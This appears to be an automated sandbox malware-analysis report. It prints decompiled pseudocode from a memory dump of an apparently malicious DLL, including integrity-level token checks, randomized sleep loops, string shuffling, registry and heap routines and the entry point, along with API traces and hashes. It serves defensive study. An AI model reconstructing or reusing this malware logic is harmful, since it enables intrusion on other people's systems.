                                                          • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04631A5A
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04631A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 04631ABA
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04631A8D
                                                          • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04631A95
                                                          • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04631AA5
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                          • String ID:
                                                          • API String ID: 1295030180-0
                                                          • Opcode ID: 069fdcc087d9ed3ff5c5d0f9236138b28431a2a3872a49ecdd8cbcbe24c64e56
                                                          • Instruction ID: 95ddd23f7b4e264c6e5098cd2358b7aab0bfb2a32a5e69522d03568dbbc0dce7
                                                          • Opcode Fuzzy Hash: 069fdcc087d9ed3ff5c5d0f9236138b28431a2a3872a49ecdd8cbcbe24c64e56
                                                          • Instruction Fuzzy Hash: 69215C7590028CFFEB00DFA4DC84EEEBBB9EB09706F004165F900A6290E7759E45EB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046312E5, Relevance: 9.1, APIs: 6, Instructions: 60sleepmemorytimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 74%
                                                          			E046312E5(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t26;
				signed int _t33;

				_t26 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0x463d238 = _t10;
				if(_t10 != 0) {
					 *0x463d1a8 = GetTickCount();
					_t12 = E04633E69(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 7;
							_push(0);
							_push(9);
							_push(_t23 >> 7);
							_push(_t16);
							L0463B08A();
							_t33 = _t14 + _t16;
							_t18 = E04635548(_a4, _t33);
							_t19 = 2;
							_t25 = _t33;
							Sleep(_t19 << _t33); // executed
						} while (_t18 == 1);
						if(E04634DA2(_t25) != 0) {
							 *0x463d260 = 1; // executed
						}
						_t12 = E04635BA2(_t26); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                                          0x046312e5
                                                          0x046312eb
                                                          0x046312ec
                                                          0x046312f8
                                                          0x046312fe
                                                          0x04631305
                                                          0x04631315
                                                          0x0463131a
                                                          0x04631321
                                                          0x04631323
                                                          0x04631328
                                                          0x0463132e
                                                          0x04631334
                                                          0x0463133e
                                                          0x04631342
                                                          0x04631344
                                                          0x04631349
                                                          0x0463134a
                                                          0x0463134b
                                                          0x04631350
                                                          0x04631356
                                                          0x0463135f
                                                          0x04631360
                                                          0x04631365
                                                          0x0463136b
                                                          0x04631377
                                                          0x04631379
                                                          0x04631379
                                                          0x04631383
                                                          0x04631383
                                                          0x04631307
                                                          0x04631309
                                                          0x04631309
                                                          0x0463138d

                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04634EF2,?), ref: 046312F8
                                                          • GetTickCount.KERNEL32 ref: 0463130C
                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,04634EF2,?), ref: 04631328
                                                          • SwitchToThread.KERNEL32(?,00000001,?,?,?,04634EF2,?), ref: 0463132E
                                                          • _aullrem.NTDLL(?,?,00000009,00000000), ref: 0463134B
                                                          • Sleep.KERNELBASE(00000002,00000000,?,00000001,?,?,?,04634EF2,?), ref: 04631365
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                          • String ID:
                                                          • API String ID: 507476733-0
                                                          • Opcode ID: 093feacedc84cd86e627b2b8ed986ac2961040a725ee3d9e00591a73ddc7e891
                                                          • Instruction ID: c69747eccb7dbaef7945130bd393d0a801f9e3f1065f76c900217eea5e184ac2
                                                          • Opcode Fuzzy Hash: 093feacedc84cd86e627b2b8ed986ac2961040a725ee3d9e00591a73ddc7e891
                                                          • Instruction Fuzzy Hash: 9B11A572A44381BFF710AB64DC19B5A7B98DB45357F004519FA85D7280FBB5FC008665
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04635BA2, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 57%
                                                          			E04635BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04636C09();
				if(_t21 != 0) {
					_t59 =  *0x463d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x463d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x463d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E0463496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x463d2a8; // 0x88a5a8
					if( *0x463d25c > 5) {
						_t8 = _t26 + 0x463e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x463e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E0463729A(_t27, _t27);
					_t31 = E0463232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x463d270 =  *0x463d270 ^ 0x81bbe65d;
						_t32 = E0463A71F(0x60);
						 *0x463d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x463d32c; // 0x4ec95b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x463d32c; // 0x4ec95b0
							 *_t51 = 0x463e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x463d238, 0, 0x43);
							 *0x463d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x463d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x463d2a8; // 0x88a5a8
								_t13 = _t58 + 0x463e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x463c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04639135( ~_v8 &  *0x463d270,  &E0463D00C); // executed
								_t54 = E0463888E(_t55);
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E046387AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E046351B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04631C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x463d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E0463A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}






























                                                          0x04635ba2
                                                          0x04635bad
                                                          0x04635bb0
                                                          0x04635bb3
                                                          0x04635bb6
                                                          0x04635bbd
                                                          0x04635bbf
                                                          0x04635bcb
                                                          0x04635bcd
                                                          0x04635bcd
                                                          0x04635bd6
                                                          0x04635bdc
                                                          0x04635be1
                                                          0x04635bfb
                                                          0x04635c07
                                                          0x04635c09
                                                          0x04635c0e
                                                          0x04635c18
                                                          0x04635c18
                                                          0x04635c10
                                                          0x04635c10
                                                          0x04635c10
                                                          0x04635c10
                                                          0x04635c1f
                                                          0x04635c2c
                                                          0x04635c33
                                                          0x04635c38
                                                          0x04635c38
                                                          0x04635c40
                                                          0x04635c43
                                                          0x04635c69
                                                          0x04635c75
                                                          0x04635c7a
                                                          0x04635c7f
                                                          0x04635c81
                                                          0x04635cad
                                                          0x04635caf
                                                          0x04635c83
                                                          0x04635c87
                                                          0x04635c8c
                                                          0x04635c91
                                                          0x04635c98
                                                          0x04635c9e
                                                          0x04635ca3
                                                          0x04635ca9
                                                          0x04635cb0
                                                          0x04635cb2
                                                          0x04635cb4
                                                          0x04635cc3
                                                          0x04635cc9
                                                          0x04635cce
                                                          0x04635cd0
                                                          0x04635d00
                                                          0x04635d02
                                                          0x04635cd2
                                                          0x04635cd2
                                                          0x04635cd8
                                                          0x04635ce5
                                                          0x04635ceb
                                                          0x04635ceb
                                                          0x04635cf3
                                                          0x04635cfc
                                                          0x04635d03
                                                          0x04635d05
                                                          0x04635d07
                                                          0x04635d0e
                                                          0x04635d1b
                                                          0x04635d25
                                                          0x04635d27
                                                          0x04635d29
                                                          0x00000000
                                                          0x00000000
                                                          0x04635d2b
                                                          0x04635d30
                                                          0x04635d32
                                                          0x04635d39
                                                          0x04635d3d
                                                          0x04635d40
                                                          0x04635d55
                                                          0x04635d59
                                                          0x04635d5e
                                                          0x00000000
                                                          0x04635d5e
                                                          0x04635d42
                                                          0x04635d44
                                                          0x00000000
                                                          0x00000000
                                                          0x04635d4f
                                                          0x04635d51
                                                          0x04635d53
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04635d53
                                                          0x04635d36
                                                          0x04635d36
                                                          0x04635d07
                                                          0x04635c45
                                                          0x04635c45
                                                          0x04635c4a
                                                          0x04635d60
                                                          0x04635d64
                                                          0x04635d6c
                                                          0x04635d6c
                                                          0x00000000
                                                          0x04635d64
                                                          0x04635c50
                                                          0x04635c53
                                                          0x04635c5d
                                                          0x04635c64
                                                          0x00000000
                                                          0x04635d74
                                                          0x04635d74
                                                          0x04635d78
                                                          0x04635d7c
                                                          0x04635d7c

                                                          APIs
                                                            • Part of subcall function 04636C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04635BBB,00000000,00000000), ref: 04636C18
                                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04635C38
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • memset.NTDLL ref: 04635C87
                                                          • RtlInitializeCriticalSection.NTDLL(04EC9570), ref: 04635C98
                                                            • Part of subcall function 04631C66: memset.NTDLL ref: 04631C7B
                                                            • Part of subcall function 04631C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04631CBD
                                                            • Part of subcall function 04631C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04631CC8
                                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04635CC3
                                                          • wsprintfA.USER32 ref: 04635CF3
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                          • String ID:
                                                          • API String ID: 4246211962-0
                                                          • Opcode ID: b6c2568629773493d7a2ca8e81c6435a876f206a3349da6862036c202f06f430
                                                          • Instruction ID: a4e7a313ceac5a5f45394f4fc0abf13df5bffe2af05a1fdf9e5ff78f1cdc3b89
                                                          • Opcode Fuzzy Hash: b6c2568629773493d7a2ca8e81c6435a876f206a3349da6862036c202f06f430
                                                          • Instruction Fuzzy Hash: 8F5173B1A00294BBEB21EFA4D888B5E77A8EB14B17F44441AF502D7240F779BD458B98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 046362DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 22%
                                                          			E046362DA(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E0463A71F(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E0463A734(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E0463A71F((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x463d278 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                                                          0x046362e1
                                                          0x046362e8
                                                          0x046362ed
                                                          0x046362f0
                                                          0x046362f7
                                                          0x046362fa
                                                          0x046362fd
                                                          0x04636302
                                                          0x04636307
                                                          0x0463645b
                                                          0x0463645d
                                                          0x0463645f
                                                          0x04636464
                                                          0x04636464
                                                          0x0463630d
                                                          0x04636310
                                                          0x04636313
                                                          0x04636315
                                                          0x04636315
                                                          0x04636319
                                                          0x00000000
                                                          0x00000000
                                                          0x0463631d
                                                          0x04636349
                                                          0x0463634e
                                                          0x04636350
                                                          0x04636350
                                                          0x04636353
                                                          0x04636356
                                                          0x04636356
                                                          0x04636358
                                                          0x00000000
                                                          0x04636323
                                                          0x04636325
                                                          0x04636344
                                                          0x04636344
                                                          0x0463635b
                                                          0x0463635b
                                                          0x0463635c
                                                          0x0463635c
                                                          0x0463635f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0463635f
                                                          0x04636329
                                                          0x04636370
                                                          0x04636374
                                                          0x0463644e
                                                          0x04636450
                                                          0x04636450
                                                          0x04636451
                                                          0x04636454
                                                          0x00000000
                                                          0x04636454
                                                          0x0463637d
                                                          0x0463638e
                                                          0x04636392
                                                          0x0463644a
                                                          0x00000000
                                                          0x0463644a
                                                          0x04636398
                                                          0x0463639b
                                                          0x0463639f
                                                          0x046363a3
                                                          0x046363a8
                                                          0x04636440
                                                          0x04636440
                                                          0x00000000
                                                          0x04636446
                                                          0x046363b3
                                                          0x046363bc
                                                          0x046363d0
                                                          0x046363d7
                                                          0x046363ec
                                                          0x046363f2
                                                          0x046363fa
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x046363fc
                                                          0x046363fc
                                                          0x046363fc
                                                          0x04636403
                                                          0x0463640b
                                                          0x00000000
                                                          0x00000000
                                                          0x0463640d
                                                          0x04636416
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x04636418
                                                          0x0463641a
                                                          0x0463641d
                                                          0x0463641d
                                                          0x04636420
                                                          0x04636424
                                                          0x04636427
                                                          0x0463642d
                                                          0x04636430
                                                          0x04636437
                                                          0x00000000
                                                          0x046363b3
                                                          0x0463632e
                                                          0x04636336
                                                          0x0463633c
                                                          0x0463633e
                                                          0x0463633e
                                                          0x04636341
                                                          0x04636343
                                                          0x00000000
                                                          0x04636343
                                                          0x0463631d
                                                          0x04636363
                                                          0x04636368
                                                          0x0463636a
                                                          0x0463636a
                                                          0x0463636d
                                                          0x0463636d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 0463A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04635595), ref: 0463A72B
                                                          • lstrcpy.KERNEL32(63699BC4,00000020), ref: 046363D7
                                                          • lstrcat.KERNEL32(63699BC4,00000020), ref: 046363EC
                                                          • lstrcmp.KERNEL32(00000000,63699BC4), ref: 04636403
                                                          • lstrlen.KERNEL32(63699BC4), ref: 04636427
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                          • String ID:
                                                          • API String ID: 3214092121-3916222277
                                                          • Opcode ID: 0a5303905fc427d6862c087ecaffbf114fce178a5d55292bfd6f98c629164dcc
                                                          • Instruction ID: abdb19840e261697266a80cbea960a6a90def5c9cae6bb0024090f32dbcc5c48
                                                          • Opcode Fuzzy Hash: 0a5303905fc427d6862c087ecaffbf114fce178a5d55292bfd6f98c629164dcc
                                                          • Instruction Fuzzy Hash: BE51C471A00288FBDF21CF99C4846ADBBB6FF51316F14C05AE9559B202E771FA52CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04634ECA, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t4;
				void* _t10;
				void* _t11;
				void* _t12;
				void* _t14;

				_t14 = 1;
				_t4 = _a8;
				if(_t4 == 0) {
					if(InterlockedDecrement(0x463d23c) == 0) {
						E04631B42();
					}
				} else {
					if(_t4 == 1 && InterlockedIncrement(0x463d23c) == 1) {
						_t10 = E046312E5(_t11, _t12, _a4); // executed
						if(_t10 != 0) {
							_t14 = 0;
						}
					}
				}
				return _t14;
			}








                                                          0x04634ed1
                                                          0x04634ed2
                                                          0x04634ed5
                                                          0x04634f07
                                                          0x04634f09
                                                          0x04634f09
                                                          0x04634ed7
                                                          0x04634ed8
                                                          0x04634eed
                                                          0x04634ef4
                                                          0x04634ef6
                                                          0x04634ef6
                                                          0x04634ef4
                                                          0x04634ed8
                                                          0x04634f11

                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0463D23C), ref: 04634EDF
                                                            • Part of subcall function 046312E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04634EF2,?), ref: 046312F8
                                                          • InterlockedDecrement.KERNEL32(0463D23C), ref: 04634EFF
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: bde350a9eb3936b17bc15a9caacc7123a7d0dab120cf27856b2e5cfbc8fbe9ae
                                                          • Instruction ID: e24d4afa78eccb66c0965817520e25230cba0d96a6d4c85e1ea8913a1f1f341d
                                                          • Opcode Fuzzy Hash: bde350a9eb3936b17bc15a9caacc7123a7d0dab120cf27856b2e5cfbc8fbe9ae
                                                          • Instruction Fuzzy Hash: 47E04F223081F557E7215FB49E08B5AE642EBD1B8BF09441CF581D1110FE20F84196A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 04638D14, Relevance: 2.6, APIs: 2, Instructions: 94memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 87%
                                                          			E04638D14(void* __edx) {
				char _v8;
				char _v12;
				void* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E0463A2F9(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x463d2a8; // 0x88a5a8
				_t4 = _t24 + 0x463edc0; // 0x4ec9368
				_t5 = _t24 + 0x463ed68; // 0x4f0053
				_t45 = E04635356( &_v16, _v8, _t5, _t4);
				if(_t45 == 0) {
					 *0x463d108(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x463d2a8; // 0x88a5a8
						_t11 = _t32 + 0x463edb4; // 0x4ec935c
						_t48 = _t11;
						_t12 = _t32 + 0x463ed68; // 0x4f0053
						_t52 = E046345C6(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x463d2a8; // 0x88a5a8
							_t13 = _t35 + 0x463edfe; // 0x30314549
							if(E04638E27(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x463d25c - 6;
								if( *0x463d25c <= 6) {
									_t42 =  *0x463d2a8; // 0x88a5a8
									_t15 = _t42 + 0x463ec0a; // 0x52384549
									E04638E27(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x463d2a8; // 0x88a5a8
							_t17 = _t38 + 0x463edf8; // 0x4ec93a0
							_t18 = _t38 + 0x463edd0; // 0x680043
							_t45 = E04635D7D(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x463d238, 0, _t52);
						}
					}
					HeapFree( *0x463d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04634F14(_t54);
				}
				return _t45;
			}

















                                                          0x04638d14
                                                          0x04638d24
                                                          0x04638d27
                                                          0x04638d2e
                                                          0x04638d30
                                                          0x04638d30
                                                          0x04638d33
                                                          0x04638d38
                                                          0x04638d3f
                                                          0x04638d51
                                                          0x04638d55
                                                          0x04638d63
                                                          0x04638d71
                                                          0x04638d75
                                                          0x04638e06
                                                          0x04638e06
                                                          0x04638d7b
                                                          0x04638d7b
                                                          0x04638d80
                                                          0x04638d80
                                                          0x04638d87
                                                          0x04638d93
                                                          0x04638d95
                                                          0x04638d97
                                                          0x04638d99
                                                          0x04638da0
                                                          0x04638db2
                                                          0x04638db4
                                                          0x04638dbb
                                                          0x04638dbd
                                                          0x04638dc4
                                                          0x04638dcf
                                                          0x04638dcf
                                                          0x04638dbb
                                                          0x04638dd4
                                                          0x04638dd9
                                                          0x04638de0
                                                          0x04638dfe
                                                          0x04638e00
                                                          0x04638e00
                                                          0x04638d97
                                                          0x04638e12
                                                          0x04638e12
                                                          0x04638e14
                                                          0x04638e19
                                                          0x04638e1b
                                                          0x04638e1b
                                                          0x04638e26

                                                          APIs
                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04EC93A0,?,00000000,30314549,00000014,004F0053,04EC935C), ref: 04638E00
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,0463523E), ref: 04638E12
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.273412911.0000000004631000.00000020.00000001.sdmp, Offset: 04630000, based on PE: true
                                                          • Associated: 00000009.00000002.273336452.0000000004630000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273671396.000000000463C000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273780141.000000000463D000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000009.00000002.273884572.000000000463F000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 0106bb074d299cdd4cb05b0a6832f256c7a82890642ad481d230c47423113206
                                                          • Instruction ID: 819b727dd7ad285430c7cb6ecc6711b04fe8fb8f70e0b721e9a18e0fd71936b6
                                                          • Opcode Fuzzy Hash: 0106bb074d299cdd4cb05b0a6832f256c7a82890642ad481d230c47423113206
                                                          • Instruction Fuzzy Hash: 91316D72900189BFEB11EB94DC44EDABBBDEF54706F04015AB60097260F671BE44DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 0463888E, Relevance: 10.7, APIs: 7, Instructions: 237memoryCOMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 95%
                                                          			E0463888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

